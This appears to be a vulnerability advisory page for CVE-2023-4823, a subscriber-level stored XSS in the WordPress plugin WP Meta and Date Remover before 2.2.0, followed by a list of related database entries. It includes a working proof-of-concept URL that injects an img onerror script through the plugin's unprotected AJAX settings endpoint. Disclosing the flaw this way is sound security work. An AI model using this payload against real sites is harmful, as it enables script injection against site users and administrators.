Lucene search
Dc11WPEX-ID:84F53E27-D8D2-4FA3-91F9-447037508D30HistoryOct 09, 2023 - 12:00 a.m.
WP Meta and Date Remover < 2.2.0 - Subscriber+ Stored XSS
2023-10-0900:00:00
dc11
40
stored xss
subscriber
url
ajax
frontend
backend
exploit
0.0004 Low
EPSS
Percentile
14.2%
Description The plugin provides an AJAX endpoint for configuring the plugin settings. This endpoint has no capability checks and does not sanitize the user input, which is then later output unescaped. Allowing any authenticated users, such as subscriber change them and perform Stored Cross-Site Scripting. Note: A partial fix was released in v2.1.0, but stored XSS was still possible for users with Admin+ privileges
Open the following URL when logged in as a subscriber:
`https://example.com/wp-admin/admin-ajax.php?action=update_settings&settings[removeByCSS]=true&settings[removeFromHome]=true&settings[cssCode]=</style><img src%3D1 onerror%3Dalert(document.domain)>`
The XSS will be triggered in any pages (both frontend and backend)Related
wpvulndb
wpvulndb
WP Meta and Date Remover < 2.2.0 - Subscriber+ Stored XSS
2023-10-09 00:00:00
cve
cve
CVE-2023-4823
2023-10-31 14:15:12
prion
prion
Cross site scripting
2023-10-31 14:15:00
cvelist
cvelist
CVE-2023-4823 WP Meta and Date Remover < 2.2.0 - Subscriber+ Stored XSS
2023-10-31 13:54:42
nvd
nvd
CVE-2023-4823
2023-10-31 14:15:12
fedora
fedora
[SECURITY] Fedora 37 Update: vim-9.0.2120-1.fc37
2023-11-26 03:08:40
[SECURITY] Fedora 39 Update: vim-9.0.2120-1.fc39
2023-11-24 01:37:40
[SECURITY] Fedora 38 Update: vim-9.0.2120-1.fc38
2023-11-26 03:05:59
wordfence
wordfence